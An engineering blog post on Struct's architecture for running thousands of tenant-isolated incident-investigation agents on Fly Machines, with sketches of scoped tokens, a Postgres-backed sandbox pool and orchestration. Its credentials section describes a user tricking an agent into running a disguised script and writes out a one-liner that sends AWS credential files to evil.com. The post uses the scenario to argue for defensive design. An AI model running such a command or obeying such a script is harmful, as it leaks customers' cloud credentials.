Struct: A Machine Per Agent, Thousands at a Time

Author: Daniel Botha

Struct keeps prod running, starting with an agent that automates your on-call runbook. When an alert fires in a customer’s production system, a Struct agent picks it up and investigates: it cross-references logs, metrics, traces, and the codebase across that team’s existing observability stack to find the root cause, gauge customer impact, and dedupe the alert against related ones, in minutes, before an engineer has to start triaging by hand. From there it can open a PR or hand the fix to a coding agent.

Every one of those investigations is a different customer, a different incident, a different production system, each with its own scoped permissions for what the agent is allowed to touch. And because the agents work over sensitive material (code, logs, and telemetry), the boundaries between them have to be airtight. Secure by default.

Running one agent like this for yourself is a sweet weekend project. Running thousands of them at once, on customer data that can never leak between tenants, is a lot more terrifying. It was, nonetheless, the challenge that the Struct team decided to take on, and the architecture they landed on is worth walking through.

The four properties that aren’t negotiable

Struct’s view is that anything running user-facing agents on sensitive data needs four things, and none of them are optional.

Security. Hard multi-tenant isolation. One tenant’s data is never reachable by another tenant, and Struct’s own internal data never reaches a tenant’s agent. Access is scoped and short-lived.

Scalability. Thousands of agents running concurrently, with room to grow further without a re-architecture.

Performance. An agent starts working on the user’s request within a second.

Reliability. An agentic system has a lot of failure points. The platform has to stay up through them.

Security is the one with the most downside, and the threat landscape only gets worse. Most teams building agents that do real work will have to solve this eventually, so here is how Struct did it.

One machine per agent

The decision the whole architecture hangs on: each agent runs in its own sandbox, and that sandbox is the tenant boundary. Struct runs its investigation agents as containers on Fly Machines, which are Firecracker microVMs.

That choice does the heaviest lifting on security. Every agent gets its own Machine with its own kernel. There is no shared runtime for one tenant’s agent to climb out of, and no path for an agent to read another tenant’s conversation or shell into another tenant’s data, because they were never on the same machine to begin with. Isolation is a property of the boundary itself, not a set of rules layered on top of a shared one.

The economics work the same way. Struct only pays for compute while an agent is actually working. When an agent goes idle, its Machine is stopped; a stopped Machine sits there without running up a compute bill, and starts again sub-second when the next message arrives, so an agent picks up a request almost immediately.

The rest follows from the Machines API giving Struct full control of each Machine: scaling is horizontal, so more agents just means more Machines, and growing the fleet is a config change rather than a redesign. Each Machine also gets a Fly Volume for session persistence. An agent resumes a conversation from a session file on disk and reaches the logs and artifacts it pulled earlier, even if its Machine was stopped in between. When the session is over, Struct destroys the whole thing.
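The stop, start, destroy lifecycle above maps onto a handful of calls against the Fly Machines REST API. Here is a minimal sketch, assuming the public endpoints under https://api.machines.dev/v1 for starting, stopping, and deleting a Machine. The MachineLifecycle class, the app name, the Machine ID, and the injected send transport are all hypothetical; this is an illustration, not Struct’s code.

```python
from dataclasses import dataclass
from typing import Callable

# Base URL of the public Fly Machines REST API.
API_BASE = "https://api.machines.dev/v1"

# (method, url) -> response body. Hypothetical transport, injected so the
# sketch stays offline; a real one would add an Authorization header.
Send = Callable[[str, str], dict]


@dataclass
class MachineLifecycle:
    app: str          # hypothetical Fly app name
    machine_id: str   # hypothetical Machine ID
    send: Send

    def _url(self, suffix: str = "") -> str:
        return f"{API_BASE}/apps/{self.app}/machines/{self.machine_id}{suffix}"

    def start(self) -> dict:
        # Wake a stopped Machine when the next message arrives.
        return self.send("POST", self._url("/start"))

    def stop(self) -> dict:
        # Agent is idle: stop the Machine so it stops accruing compute.
        return self.send("POST", self._url("/stop"))

    def destroy(self) -> dict:
        # Session is over: delete the Machine outright instead of reusing it.
        return self.send("DELETE", self._url())
```

Injecting the transport keeps the lifecycle logic separate from HTTP and auth details, which makes it easy to exercise without touching a real fleet.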

Keep the credentials off the agent’s machine

The obvious way to let an agent call a tool is to drop credentials on its machine and let it call the API directly. LLMs will suggest exactly this. In the immortal words of Admiral Ackbar, it’s a trap.

The Struct team saw this playing out in the wild and decided they needed to do better. Picture the scenario: your agent automates compliance audits, so it needs to read a customer’s AWS CloudTrail. Customers grant your AWS account a role that can read their logs. You authenticate the aws CLI inside the sandbox, which writes credentials to JSON files under ~/.aws. Then a user gets your agent to run a friendly-looking super-safe-script.sh that quietly does cat ~/.aws/*.json | curl -d @- evil.com, and now one user is holding the keys to every customer’s data.

You can try to patch around this with user privileges and sandbox rules, but agents are good at finding holes, and a complex security model is one you will eventually get wrong. Secure by default beats secure-if-configured-correctly.

So Struct never puts tenant or platform credentials on the agent’s sandbox at all. Tools are scoped MCP servers that Struct hosts. Each server is scoped to a single agent’s permissions, calls the third-party API with credentials held server-side, and is locked down with auth and network controls. The tokens that reach an agent are short-lived and live in its process memory, never on disk.
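To make "scoped and short-lived" concrete, here is one way a tool server could mint and check a per-agent token. It is a sketch under assumptions: the HMAC-signed format, the claim names, and the mint_token and authorize helpers are hypothetical, and the post does not say what token scheme Struct actually uses. The point is only that the token names one agent, a fixed set of tools, and an expiry, while the third-party credentials stay server-side.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional, Sequence


def mint_token(secret: bytes, agent_id: str, tools: Sequence[str],
               ttl_s: int = 300, now: Optional[float] = None) -> str:
    """Issue a signed token scoped to one agent, some tools, and a short TTL."""
    issued = time.time() if now is None else now
    claims = {"agent": agent_id, "tools": sorted(tools), "exp": issued + ttl_s}
    body = base64.urlsafe_b64encode(json.dumps(claims, sort_keys=True).encode())
    sig = hmac.new(secret, body, hashlib.sha256).hexdigest()
    return f"{body.decode()}.{sig}"


def authorize(secret: bytes, token: str, tool: str,
              now: Optional[float] = None) -> bool:
    """Server-side check: valid signature, not expired, tool is in scope."""
    try:
        body, sig = token.rsplit(".", 1)
    except ValueError:
        return False  # not even shaped like a token
    expected = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison so the check does not leak signature bytes.
    if not hmac.compare_digest(sig.encode(), expected.encode()):
        return False
    claims = json.loads(base64.urlsafe_b64decode(body))
    current = time.time() if now is None else now
    return current < claims["exp"] and tool in claims["tools"]
```

If a token like this leaks, it unlocks one agent’s tools for a few minutes, not a cloud account.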

A pool of warm sandboxes

Dispatching an agent cold is both slow and risky. Provisioning can fail. Installing dependencies takes minutes. Pulling and deploying a container image takes minutes. On the critical path, that is the user watching a spinner or an error.

Struct keeps a pool of pre-provisioned sandboxes instead. They sit stopped, so they are cheap to keep around, and start sub-second on demand. Replenishment runs in the background, so nobody waits for a new sandbox to come online, and failed provisions retry out of band. That background retry has let Struct ride out downstream outages with no customer impact.
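The replenishment loop can be sketched in a few lines. This version assumes a hypothetical provision callable that returns a sandbox ID or raises, plus a target pool size; the names and the fixed attempt count are illustrative, and a production version would likely add backoff between attempts.

```python
from typing import Callable, List


def replenish(ready: int, target: int, provision: Callable[[], str],
              max_attempts: int = 3) -> List[str]:
    """Top the pool up to `target`, retrying failed provisions.

    Meant to run as a background job, off the request path. If every
    attempt for a slot fails, the slot is skipped and the next pass
    picks up the deficit.
    """
    created: List[str] = []
    for _ in range(max(0, target - ready)):
        for _attempt in range(max_attempts):
            try:
                created.append(provision())
                break
            except Exception:
                # The failure stays in the background; no user is waiting.
                continue
    return created
```

Because nothing here sits on the critical path, a flaky provider costs retries, not user-visible errors.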

When an agent spins up, it atomically claims a sandbox from the pool. Struct manages the pool in Postgres and uses FOR UPDATE SKIP LOCKED to settle concurrent claims cleanly. The sandbox starts, the agent dispatches. When the agent is done, its Machine is destroyed, never recycled, which kills an entire class of state-leakage bugs and keeps the security model simple.
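The claim itself is a well-known Postgres queue pattern. The sketch below assumes a hypothetical sandboxes table with id, status, agent_id, created_at, and claimed_at columns, and a DB-API cursor such as the one psycopg provides; Struct’s real schema is not described in this post.

```python
# Hypothetical schema: sandboxes(id, status, agent_id, created_at, claimed_at).
CLAIM_SQL = """
UPDATE sandboxes
SET status = 'claimed', agent_id = %s, claimed_at = now()
WHERE id = (
    SELECT id
    FROM sandboxes
    WHERE status = 'ready'
    ORDER BY created_at
    LIMIT 1
    FOR UPDATE SKIP LOCKED
)
RETURNING id
"""


def claim_sandbox(cursor, agent_id: str):
    """Claim one ready sandbox for `agent_id`.

    Returns the sandbox id, or None if the pool is drained. Rows already
    locked by a concurrent claim are skipped rather than waited on.
    """
    cursor.execute(CLAIM_SQL, (agent_id,))
    row = cursor.fetchone()
    return row[0] if row else None
```

SKIP LOCKED is what keeps concurrent claimers from queuing behind each other: each transaction passes over rows another transaction has locked and takes the next free one, so two agents never end up with the same sandbox.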

Orchestration that survives a deploy

The pool makes starts fast and reliable, but three jobs still have to stay reliable across a multi-instance server: claiming sandboxes for incoming requests, keeping the pool stocked, and running and monitoring each agent. In-memory state can’t carry those. When a server instance restarts, anything in memory dies with it.

Struct uses Temporal, which is open source and self-hosted, for durable orchestration. Claims, provisions, and agent executions are workflows that survive process restarts, and retries, timeouts, and signal-based coordination come with it. One claim coordinator serves the pool FIFO and handles backpressure when it is drained. Provisions queue up to refill the pool, and when a new sandbox is ready, a signal wakes the coordinator, so it never has to sit in a polling loop. When new code ships, in-flight claims, provisions, and agent runs ride across the rolling deploy rather than dropping.
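The coordinator’s shape, FIFO claims woken by a signal rather than a poll, is easy to see in miniature. The sketch below uses plain asyncio, not Temporal, and the ClaimCoordinator class is hypothetical. Its state lives in memory, so it has exactly the restart problem described above; it only illustrates the coordination pattern that Temporal workflows make durable.

```python
import asyncio
from collections import deque


class ClaimCoordinator:
    """In-memory illustration of FIFO claims with signal-based wakeups."""

    def __init__(self) -> None:
        self._ready = deque()    # sandbox IDs waiting to be claimed
        self._waiters = deque()  # futures for pending claims, oldest first

    def sandbox_ready(self, sandbox_id: str) -> None:
        """Signal from a finished provision: hand off to the oldest waiter."""
        while self._waiters:
            fut = self._waiters.popleft()
            if not fut.done():  # skip claims that already timed out
                fut.set_result(sandbox_id)
                return
        self._ready.append(sandbox_id)

    async def claim(self, timeout: float = 30.0) -> str:
        """Take a ready sandbox, or wait in line until one is signalled."""
        if self._ready:
            return self._ready.popleft()
        fut = asyncio.get_running_loop().create_future()
        self._waiters.append(fut)
        # Backpressure: a drained pool makes callers wait, bounded by timeout.
        return await asyncio.wait_for(fut, timeout)
```

A claim against a drained pool parks on a future and costs nothing until a provision signals it, which is the same trade the post describes: no polling loop, and claims served in arrival order.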

A foundation, not a workaround

Harness, sandbox, scoped tools, pool, orchestration: most of this is portable to whatever sandbox you pick. Struct put its agents on Fly Machines because the Machine boundary handed them tenant isolation as a property of the platform, sub-second starts, a compute bill that tracks actual work, and a fleet that grows with a config change. For a product whose whole job is running someone else’s sensitive work in isolation, thousands of times over, that is the right place to build. Today it runs thousands of agents concurrently, with room to grow.
